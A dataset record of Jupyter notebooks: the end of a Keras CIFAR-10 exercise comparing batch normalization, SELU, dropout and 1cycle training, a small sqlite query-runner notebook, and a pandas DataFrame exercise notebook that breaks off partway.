val_accuracy: 0.5442\nEpoch 47/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.8996 - accuracy: 0.6850 - val_loss: 1.4449 - val_accuracy: 0.5280\nEpoch 48/100\n1407/1407 [==============================] - 13s 9ms/step - loss: 0.9050 - accuracy: 0.6835 - val_loss: 1.4167 - val_accuracy: 0.5338\nEpoch 49/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.8934 - accuracy: 0.6880 - val_loss: 1.4260 - val_accuracy: 0.5294\n157/157 [==============================] - 1s 2ms/step - loss: 1.3344 - accuracy: 0.5398\n" ] ], [ [ "* *Is the model converging faster than before?* Much faster! The previous model took 27 epochs to reach the lowest validation loss, while the new model achieved that same loss in just 5 epochs and continued to make progress until the 16th epoch. The BN layers stabilized training and allowed us to use a much larger learning rate, so convergence was faster.\n* *Does BN produce a better model?* Yes! The final model is also much better, with 54.0% accuracy instead of 47.6%. It's still not a very good model, but at least it's much better than before (a Convolutional Neural Network would do much better, but that's a different topic, see chapter 14).\n* *How does BN affect training speed?* Although the model converged much faster, each epoch took about 12s instead of 8s, because of the extra computations required by the BN layers. But overall the training time (wall time) was shortened significantly!", "_____no_output_____" ], [ "### d.\n*Exercise: Try replacing Batch Normalization with SELU, and make the necessary adjustements to ensure the network self-normalizes (i.e., standardize the input features, use LeCun normal initialization, make sure the DNN contains only a sequence of dense layers, etc.).*", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.Nadam(learning_rate=7e-4)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_selu_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_logs\", \"run_selu_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]\n\nX_means = X_train.mean(axis=0)\nX_stds = X_train.std(axis=0)\nX_train_scaled = (X_train - X_means) / X_stds\nX_valid_scaled = (X_valid - X_means) / X_stds\nX_test_scaled = (X_test - X_means) / X_stds\n\nmodel.fit(X_train_scaled, y_train, epochs=100,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=callbacks)\n\nmodel = keras.models.load_model(\"my_cifar10_selu_model.h5\")\nmodel.evaluate(X_valid_scaled, y_valid)", "Epoch 1/100\n1407/1407 [==============================] - 10s 5ms/step - loss: 2.0622 - accuracy: 0.2631 - val_loss: 1.7878 - val_accuracy: 0.3552\nEpoch 2/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.7328 - accuracy: 0.3830 - val_loss: 1.7028 - val_accuracy: 0.3828\nEpoch 3/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.6342 - accuracy: 0.4279 - val_loss: 1.6692 - val_accuracy: 0.4022\nEpoch 4/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5524 - accuracy: 0.4538 - val_loss: 1.6350 - val_accuracy: 0.4300\nEpoch 5/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4979 - accuracy: 0.4756 - val_loss: 1.5773 - val_accuracy: 0.4356\nEpoch 6/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4428 - accuracy: 0.4902 - val_loss: 1.5529 - val_accuracy: 0.4630\nEpoch 7/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3966 - accuracy: 0.5126 - val_loss: 1.5290 - val_accuracy: 0.4682\nEpoch 8/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3549 - accuracy: 0.5232 - val_loss: 1.4633 - val_accuracy: 0.4792\nEpoch 9/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3162 - accuracy: 0.5444 - val_loss: 1.4787 - val_accuracy: 0.4776\nEpoch 10/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2825 - accuracy: 0.5534 - val_loss: 1.4794 - val_accuracy: 0.4934\nEpoch 11/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2529 - accuracy: 0.5682 - val_loss: 1.5529 - val_accuracy: 0.4982\nEpoch 12/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2256 - accuracy: 0.5784 - val_loss: 1.4942 - val_accuracy: 0.4902\nEpoch 13/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2049 - accuracy: 0.5823 - val_loss: 1.4868 - val_accuracy: 0.5024\nEpoch 14/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1627 - accuracy: 0.6012 - val_loss: 1.4839 - val_accuracy: 0.5082\nEpoch 15/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1543 - accuracy: 0.6034 - val_loss: 1.5097 - val_accuracy: 0.4968\nEpoch 16/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1200 - accuracy: 0.6135 - val_loss: 1.5001 - val_accuracy: 0.5120\nEpoch 17/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1028 - accuracy: 0.6199 - val_loss: 1.4856 - val_accuracy: 0.5056\nEpoch 18/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0863 - accuracy: 0.6265 - val_loss: 1.5116 - val_accuracy: 0.4966\nEpoch 19/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0715 - accuracy: 0.6345 - val_loss: 1.5787 - val_accuracy: 0.5070\nEpoch 20/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0342 - accuracy: 0.6453 - val_loss: 1.4987 - val_accuracy: 0.5144\nEpoch 21/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0169 - accuracy: 0.6531 - val_loss: 1.6292 - val_accuracy: 0.4462\nEpoch 22/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1346 - accuracy: 0.6074 - val_loss: 1.5280 - val_accuracy: 0.5136\nEpoch 23/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9820 - accuracy: 0.6678 - val_loss: 1.5392 - val_accuracy: 0.5040\nEpoch 24/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9701 - accuracy: 0.6679 - val_loss: 1.5505 - val_accuracy: 0.5170\nEpoch 25/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3604 - accuracy: 0.6753 - val_loss: 1.5468 - val_accuracy: 0.4992\nEpoch 26/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0177 - accuracy: 0.6510 - val_loss: 1.5474 - val_accuracy: 0.5020\nEpoch 27/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9425 - accuracy: 0.6798 - val_loss: 1.5545 - val_accuracy: 0.5076\nEpoch 28/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9005 - accuracy: 0.6902 - val_loss: 1.5659 - val_accuracy: 0.5138\n157/157 [==============================] - 0s 1ms/step - loss: 1.4633 - accuracy: 0.4792\n" ], [ "model = keras.models.load_model(\"my_cifar10_selu_model.h5\")\nmodel.evaluate(X_valid_scaled, y_valid)", "157/157 [==============================] - 0s 1ms/step - loss: 1.4633 - accuracy: 0.4792\n" ] ], [ [ "We get 47.9% accuracy, which is not much better than the original model (47.6%), and not as good as the model using batch normalization (54.0%). However, convergence was almost as fast as with the BN model, plus each epoch took only 7 seconds. So it's by far the fastest model to train so far.", "_____no_output_____" ], [ "### e.\n*Exercise: Try regularizing the model with alpha dropout. Then, without retraining your model, see if you can achieve better accuracy using MC Dropout.*", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\n\nmodel.add(keras.layers.AlphaDropout(rate=0.1))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.Nadam(learning_rate=5e-4)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_alpha_dropout_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_logs\", \"run_alpha_dropout_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]\n\nX_means = X_train.mean(axis=0)\nX_stds = X_train.std(axis=0)\nX_train_scaled = (X_train - X_means) / X_stds\nX_valid_scaled = (X_valid - X_means) / X_stds\nX_test_scaled = (X_test - X_means) / X_stds\n\nmodel.fit(X_train_scaled, y_train, epochs=100,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=callbacks)\n\nmodel = keras.models.load_model(\"my_cifar10_alpha_dropout_model.h5\")\nmodel.evaluate(X_valid_scaled, y_valid)", "Epoch 1/100\n1407/1407 [==============================] - 9s 5ms/step - loss: 2.0583 - accuracy: 0.2742 - val_loss: 1.7429 - val_accuracy: 0.3858\nEpoch 2/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.6852 - accuracy: 0.4008 - val_loss: 1.7055 - val_accuracy: 0.3792\nEpoch 3/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5963 - accuracy: 0.4413 - val_loss: 1.7401 - val_accuracy: 0.4072\nEpoch 4/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5231 - accuracy: 0.4634 - val_loss: 1.5728 - val_accuracy: 0.4584\nEpoch 5/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4619 - accuracy: 0.4887 - val_loss: 1.5448 - val_accuracy: 0.4702\nEpoch 6/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.4074 - accuracy: 0.5061 - val_loss: 1.5678 - val_accuracy: 0.4664\nEpoch 7/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.3718 - accuracy: 0.5222 - val_loss: 1.5764 - val_accuracy: 0.4824\nEpoch 8/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3220 - accuracy: 0.5387 - val_loss: 1.4805 - val_accuracy: 0.4890\nEpoch 9/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.2908 - accuracy: 0.5487 - val_loss: 1.5521 - val_accuracy: 0.4638\nEpoch 10/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2537 - accuracy: 0.5607 - val_loss: 1.5281 - val_accuracy: 0.4924\nEpoch 11/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.2215 - accuracy: 0.5782 - val_loss: 1.5147 - val_accuracy: 0.5046\nEpoch 12/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1910 - accuracy: 0.5831 - val_loss: 1.5248 - val_accuracy: 0.5002\nEpoch 13/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.1659 - accuracy: 0.5982 - val_loss: 1.5620 - val_accuracy: 0.5066\nEpoch 14/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.1282 - accuracy: 0.6120 - val_loss: 1.5440 - val_accuracy: 0.5180\nEpoch 15/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.1127 - accuracy: 0.6133 - val_loss: 1.5782 - val_accuracy: 0.5146\nEpoch 16/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0917 - accuracy: 0.6266 - val_loss: 1.6182 - val_accuracy: 0.5182\nEpoch 17/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.0620 - accuracy: 0.6331 - val_loss: 1.6285 - val_accuracy: 0.5126\nEpoch 18/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0433 - accuracy: 0.6413 - val_loss: 1.6299 - val_accuracy: 0.5158\nEpoch 19/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0087 - accuracy: 0.6549 - val_loss: 1.7172 - val_accuracy: 0.5062\nEpoch 20/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 0.9950 - accuracy: 0.6571 - val_loss: 1.6524 - val_accuracy: 0.5098\nEpoch 21/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9848 - accuracy: 0.6652 - val_loss: 1.7686 - val_accuracy: 0.5038\nEpoch 22/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9597 - accuracy: 0.6744 - val_loss: 1.6177 - val_accuracy: 0.5084\nEpoch 23/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9399 - accuracy: 0.6790 - val_loss: 1.7095 - val_accuracy: 0.5082\nEpoch 24/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9148 - accuracy: 0.6884 - val_loss: 1.7160 - val_accuracy: 0.5150\nEpoch 25/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 0.9023 - accuracy: 0.6949 - val_loss: 1.7017 - val_accuracy: 0.5152\nEpoch 26/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.8732 - accuracy: 0.7031 - val_loss: 1.7274 - val_accuracy: 0.5088\nEpoch 27/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 0.8542 - accuracy: 0.7091 - val_loss: 1.7648 - val_accuracy: 0.5166\nEpoch 28/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.8499 - accuracy: 0.7118 - val_loss: 1.7973 - val_accuracy: 0.5000\n157/157 [==============================] - 0s 1ms/step - loss: 1.4805 - accuracy: 0.4890\n" ] ], [ [ "The model reaches 48.9% accuracy on the validation set. That's very slightly better than without dropout (47.6%). With an extensive hyperparameter search, it might be possible to do better (I tried dropout rates of 5%, 10%, 20% and 40%, and learning rates 1e-4, 3e-4, 5e-4, and 1e-3), but probably not much better in this case.", "_____no_output_____" ], [ "Let's use MC Dropout now. We will need the `MCAlphaDropout` class we used earlier, so let's just copy it here for convenience:", "_____no_output_____" ] ], [ [ "class MCAlphaDropout(keras.layers.AlphaDropout):\n def call(self, inputs):\n return super().call(inputs, training=True)", "_____no_output_____" ] ], [ [ "Now let's create a new model, identical to the one we just trained (with the same weights), but with `MCAlphaDropout` dropout layers instead of `AlphaDropout` layers:", "_____no_output_____" ] ], [ [ "mc_model = keras.models.Sequential([\n MCAlphaDropout(layer.rate) if isinstance(layer, keras.layers.AlphaDropout) else layer\n for layer in model.layers\n])", "_____no_output_____" ] ], [ [ "Then let's add a couple utility functions. The first will run the model many times (10 by default) and it will return the mean predicted class probabilities. The second will use these mean probabilities to predict the most likely class for each instance:", "_____no_output_____" ] ], [ [ "def mc_dropout_predict_probas(mc_model, X, n_samples=10):\n Y_probas = [mc_model.predict(X) for sample in range(n_samples)]\n return np.mean(Y_probas, axis=0)\n\ndef mc_dropout_predict_classes(mc_model, X, n_samples=10):\n Y_probas = mc_dropout_predict_probas(mc_model, X, n_samples)\n return np.argmax(Y_probas, axis=1)", "_____no_output_____" ] ], [ [ "Now let's make predictions for all the instances in the validation set, and compute the accuracy:", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\ny_pred = mc_dropout_predict_classes(mc_model, X_valid_scaled)\naccuracy = np.mean(y_pred == y_valid[:, 0])\naccuracy", "_____no_output_____" ] ], [ [ "We get no accuracy improvement in this case (we're still at 48.9% accuracy).\n\nSo the best model we got in this exercise is the Batch Normalization model.", "_____no_output_____" ], [ "### f.\n*Exercise: Retrain your model using 1cycle scheduling and see if it improves training speed and model accuracy.*", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\n\nmodel.add(keras.layers.AlphaDropout(rate=0.1))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.SGD(learning_rate=1e-3)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "batch_size = 128\nrates, losses = find_learning_rate(model, X_train_scaled, y_train, epochs=1, batch_size=batch_size)\nplot_lr_vs_loss(rates, losses)\nplt.axis([min(rates), max(rates), min(losses), (losses[0] + min(losses)) / 1.4])", "352/352 [==============================] - 2s 6ms/step - loss: nan - accuracy: 0.1255\n" ], [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\n\nmodel.add(keras.layers.AlphaDropout(rate=0.1))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.SGD(learning_rate=1e-2)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "n_epochs = 15\nonecycle = OneCycleScheduler(math.ceil(len(X_train_scaled) / batch_size) * n_epochs, max_rate=0.05)\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs, batch_size=batch_size,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[onecycle])", "Epoch 1/15\n352/352 [==============================] - 3s 6ms/step - loss: 2.2298 - accuracy: 0.2349 - val_loss: 1.7841 - val_accuracy: 0.3834\nEpoch 2/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.7928 - accuracy: 0.3689 - val_loss: 1.6806 - val_accuracy: 0.4086\nEpoch 3/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.6475 - accuracy: 0.4190 - val_loss: 1.6378 - val_accuracy: 0.4350\nEpoch 4/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.5428 - accuracy: 0.4543 - val_loss: 1.6266 - val_accuracy: 0.4390\nEpoch 5/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.4865 - accuracy: 0.4769 - val_loss: 1.6158 - val_accuracy: 0.4384\nEpoch 6/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.4339 - accuracy: 0.4866 - val_loss: 1.5850 - val_accuracy: 0.4412\nEpoch 7/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.4042 - accuracy: 0.5056 - val_loss: 1.6146 - val_accuracy: 0.4384\nEpoch 8/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.3437 - accuracy: 0.5229 - val_loss: 1.5299 - val_accuracy: 0.4846\nEpoch 9/15\n352/352 [==============================] - 2s 5ms/step - loss: 1.2721 - accuracy: 0.5459 - val_loss: 1.5145 - val_accuracy: 0.4874\nEpoch 10/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.1942 - accuracy: 0.5698 - val_loss: 1.4958 - val_accuracy: 0.5040\nEpoch 11/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.1211 - accuracy: 0.6033 - val_loss: 1.5406 - val_accuracy: 0.4984\nEpoch 12/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.0673 - accuracy: 0.6161 - val_loss: 1.5284 - val_accuracy: 0.5144\nEpoch 13/15\n352/352 [==============================] - 2s 6ms/step - loss: 0.9927 - accuracy: 0.6435 - val_loss: 1.5449 - val_accuracy: 0.5140\nEpoch 14/15\n352/352 [==============================] - 2s 6ms/step - loss: 0.9205 - accuracy: 0.6703 - val_loss: 1.5652 - val_accuracy: 0.5224\nEpoch 15/15\n352/352 [==============================] - 2s 6ms/step - loss: 0.8936 - accuracy: 0.6801 - val_loss: 1.5912 - val_accuracy: 0.5198\n" ] ], [ [ "One cycle allowed us to train the model in just 15 epochs, each taking only 2 seconds (thanks to the larger batch size). This is several times faster than the fastest model we trained so far. Moreover, we improved the model's performance (from 47.6% to 52.0%). The batch normalized model reaches a slightly better performance (54%), but it's much slower to train.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ] ]
e72e4c6dc3ef0d9c180043d7b3df3d22f87aff10
6,948
ipynb
Jupyter Notebook
python/rishav/Untitled.ipynb
junaid1460/code-contribs
69b18864c3112e4efae92b8a43825d1bd344b869
[ "MIT" ]
null
null
null
python/rishav/Untitled.ipynb
junaid1460/code-contribs
69b18864c3112e4efae92b8a43825d1bd344b869
[ "MIT" ]
null
null
null
python/rishav/Untitled.ipynb
junaid1460/code-contribs
69b18864c3112e4efae92b8a43825d1bd344b869
[ "MIT" ]
null
null
null
25.638376
55
0.444588
[ [ [ "import sqlite3 as sql\nconnection = sql.connect(\"localdb\")\ncursor = connection.cursor()\nq = open(\"./queries.sql\").read()\nq = q.split(';')\nout = []\nfor i in q:\n out.append(i.replace('\\n', ''))\ntry:\n for line in out:\n cursor.execute(line)\n print(\"Executed successfully\")\nexcept:\n pass\nres = cursor.execute(\"select * from Player\")\nres.fetchall()", "_____no_output_____" ], [ "\n\n\n\n\n\n\n\n\n\n\n\n\n", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code" ] ]
e72e556bc3ae8fd13c0b656e81f2f0cbf545f66e
201,388
ipynb
Jupyter Notebook
Pandas_Exercise_Dataframe.ipynb
yaozeliang/pandas_share
677bf46641e343d739f15a28408016e1b2c8efb0
[ "MIT" ]
15
2019-04-05T07:44:26.000Z
2020-12-15T19:09:01.000Z
Pandas_Exercise_Dataframe.ipynb
yaozeliang/pandas_share
677bf46641e343d739f15a28408016e1b2c8efb0
[ "MIT" ]
null
null
null
Pandas_Exercise_Dataframe.ipynb
yaozeliang/pandas_share
677bf46641e343d739f15a28408016e1b2c8efb0
[ "MIT" ]
5
2019-10-15T08:11:54.000Z
2020-06-23T06:51:53.000Z
25.948718
157
0.32352
[ [ [ "### 1", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np", "_____no_output_____" ], [ "exam_data = {'name': ['Anastasia', 'Dima', 'Katherine', 'James', 'Emily', 'Michael', 'Matthew', 'Laura', 'Kevin', 'Jonas'],\n 'score': [12.5, 9, 16.5, np.nan, 9, 20, 14.5, np.nan, 8, 19],\n 'attempts': [1, 3, 2, 3, 2, 3, 1, 1, 2, 1],\n 'qualify': ['yes', 'no', 'yes', 'no', 'no', 'yes', 'yes', 'no', 'no', 'yes']}\nlabels = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']\n\ndf = pd.DataFrame(exam_data , index=labels)\ndf", "_____no_output_____" ], [ "df.info()", "<class 'pandas.core.frame.DataFrame'>\nIndex: 10 entries, a to j\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 name 10 non-null object \n 1 score 8 non-null float64\n 2 attempts 10 non-null int64 \n 3 qualify 10 non-null object \ndtypes: float64(1), int64(1), object(2)\nmemory usage: 400.0+ bytes\n" ], [ "df.iloc[:3]", "_____no_output_____" ], [ "df.head(3)", "_____no_output_____" ], [ "df[['name','score']][:4]", "_____no_output_____" ], [ "print(\"Select specific columns and rows:\")\ndf.iloc[[1, 3, 5, 6], [1, 3]]", "Select specific columns and rows:\n" ], [ "print(\"Number of attempts in the examination is greater than 2:\")\ndf[df['attempts'] > 2]", "Number of attempts in the examination is greater than 2:\n" ] ], [ [ "#### count the number of rows and columns ", "_____no_output_____" ] ], [ [ "total_rows=len(df.axes[0])\ntotal_cols=len(df.axes[1])\nprint(\"Number of Rows: \"+str(total_rows))\nprint(\"Number of Columns: \"+str(total_cols))", "Number of Rows: 10\nNumber of Columns: 4\n" ], [ "print(f\"Number of Rows: {df.shape[0]}\")\nprint(f\"Number of Columns: {df.shape[1]}\")", "Number of Rows: 10\nNumber of Columns: 4\n" ] ], [ [ "#### select the rows where the score is missing", "_____no_output_____" ] ], [ [ "print(\"Rows where score is missing:\")\ndf[df['score'].isnull()]\n", "Rows where score is missing:\n" ] ], [ [ "#### select the rows the score is between 15 and 20 (inclusive)", "_____no_output_____" ] ], [ [ "df[df['score'].between(15, 20)]", "_____no_output_____" ], [ "df[(df['score']>=15) & (df['score']<=20)]", "_____no_output_____" ] ], [ [ "#### select the rows where number of attempts in the examination is less than 2 and score greater than 15", "_____no_output_____" ] ], [ [ "df[(df['attempts'] < 2) & (df['score'] > 15)]", "_____no_output_____" ] ], [ [ "#### change the score in row 'd' to 11.5", "_____no_output_____" ] ], [ [ "print(\"\\nOriginal data frame:\")\nprint(df)\nprint(\"\\nChange the score in row 'd' to 11.5:\")\ndf.loc['d', 'score'] = 11.5\ndf", "\nOriginal data frame:\n name score attempts qualify\na Anastasia 12.5 1 yes\nb Dima 9.0 3 no\nc Katherine 16.5 2 yes\nd James NaN 3 no\ne Emily 9.0 2 no\nf Michael 20.0 3 yes\ng Matthew 14.5 1 yes\nh Laura NaN 1 no\ni Kevin 8.0 2 no\nj Jonas 19.0 1 yes\n\nChange the score in row 'd' to 11.5:\n" ] ], [ [ "#### sum of the examination attempts by the students", "_____no_output_____" ] ], [ [ "df['attempts'].sum()", "_____no_output_____" ], [ "sum(df.attempts)", "_____no_output_____" ] ], [ [ "#### mean score for each different student in DataFrame", "_____no_output_____" ] ], [ [ "np.mean(df['score'])", "_____no_output_____" ], [ "mean = df['score'].mean()", "_____no_output_____" ], [ "\"{:.2f}\".format(mean)", "_____no_output_____" ], [ "\"{:.3f}\".format(mean)", "_____no_output_____" ], [ "\"{:.2f}%\".format(mean)", "_____no_output_____" ] ], [ [ "#### append a new row 'k' to data frame", "_____no_output_____" ] ], [ [ "print(\"\\nAppend a new row:\")\ndf.loc['k'] = [1, 'Suresh', 'yes', 15.5]\ndf", "\nAppend a new row:\n" 